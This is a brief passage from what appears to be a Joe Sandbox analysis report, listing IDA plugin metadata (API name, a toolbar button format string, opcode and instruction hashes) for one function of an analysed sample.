                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3MessageRegisterWindow
                                                                              • String ID: ToolbarButton%p
                                                                              • API String ID: 875023513-899657487
                                                                              • Opcode ID: 2b2334a272c30c1d589a3c4b01b979abdb66b6dcf98dba5705c1e490adaaaddb
                                                                              • Instruction ID: 82c2bbd4be8c4d2b6b5296ef8d432d9ae8caff5658f2c648b4d8071dc8e6acf2
                                                                              • Opcode Fuzzy Hash: 2b2334a272c30c1d589a3c4b01b979abdb66b6dcf98dba5705c1e490adaaaddb
                                                                              • Instruction Fuzzy Hash: E2F0A9358002119ACF20FB74D806BAE73B4BF00315F005949F9A87B2A6DF3D5A15DB94